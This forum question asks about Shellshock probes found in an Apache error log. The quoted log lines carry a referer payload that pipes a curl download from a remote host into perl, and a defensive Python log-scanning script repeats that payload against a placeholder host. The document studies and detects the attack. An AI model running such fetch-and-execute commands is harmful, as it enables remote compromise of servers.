
Typically my Apache error logs get hit with a large volume of the typical 'phpmyadmin' (requests and a huge qty of spelling variations), WordPress admin, Joomla and a whole load more.

But last night my server got hit with an unusually high volume of a new type:

[Mon Oct 27 20:22:58 2014] [error] [client 46.105.118.179] File does not exist: /var/www/details.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl

And

[Mon Oct 27 20:22:59 2014] [error] [client 46.105.118.179] script not found or unable to stat: /usr/lib/cgi-bin/zml.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | p$

They all are after slight variations of the above two.

Has anyone else seen this? What are they after? Are there any extra security precautions that I might be able to put in place for such attacks?

John
  • At first glance that looks like a client/bot unsuccessfully trying to exploit the ShellShock bugs in (non-existent) CGI scripts. – HBruijn Oct 28 '14 at 12:14
  • Ah ok, thanks for the tip. I will have a dig around on this issue and see what I find. – John Oct 28 '14 at 14:05
  • https://www.google.com/search?q=http%3A%2F%2F202.143.160.141%2Flib21%2Findex.cgi&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=rcs shows a few more people are being hit with this. As @HBruijn notes, it's trying to run a command on your server that connects to the hacker's server, which will show your server is vulnerable. –  Oct 28 '14 at 17:33
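
One way to pull probes like the ones quoted in the question out of an Apache error log and see which clients send them and which CGI paths they try. This is an added example, not part of the original question or its comments; it assumes the Apache 2.2-style error log layout shown above, and the function names, sample lines, addresses and host name are constructed for illustration.

```python
import re
from collections import Counter

# Apache 2.2-style error log line: [timestamp] [level] [client IP] message
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<client>[^\]]+)\] (?P<msg>.*)$")
# Bash function-definition prefix "() {" that these probes place in a request header
PROBE_RE = re.compile(r"\(\s*\)\s*\{")
# Path Apache reported as missing in the two message types seen in the question
PATH_RE = re.compile(
    r"(?:File does not exist|script not found or unable to stat): (?P<path>[^,\s]+)")

# Constructed sample lines (documentation IP ranges, placeholder host), not a real log
SAMPLE_LOG = """\
[Mon Oct 27 20:22:58 2014] [error] [client 192.0.2.10] File does not exist: /var/www/details.cgi, referer: () { :; }; curl http://attacker.example/x | perl
[Mon Oct 27 20:22:59 2014] [error] [client 192.0.2.10] script not found or unable to stat: /usr/lib/cgi-bin/zml.cgi, referer: () { :; }; curl http://attacker.example/x | perl
[Mon Oct 27 20:23:04 2014] [error] [client 198.51.100.7] File does not exist: /var/www/phpmyadmin
[Mon Oct 27 20:23:09 2014] [error] [client 198.51.100.7] File does not exist: /var/www/favicon.ico, referer: http://www.example.com/
"""

def find_probes(lines):
    """Return one dict per log line whose message carries the '() {' prefix."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or not PROBE_RE.search(m["msg"]):
            continue  # unparseable line or ordinary 404 noise
        path = PATH_RE.search(m["msg"])
        hits.append({"ts": m["ts"], "client": m["client"],
                     "path": path["path"] if path else None})
    return hits

def probes_per_client(hits):
    """Count probe lines per client address, for review or blocking decisions."""
    return Counter(h["client"] for h in hits)

if __name__ == "__main__":
    hits = find_probes(SAMPLE_LOG.splitlines())
    for h in hits:
        print(h["ts"], h["client"], h["path"])
    print(dict(probes_per_client(hits)))
```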

0 Answers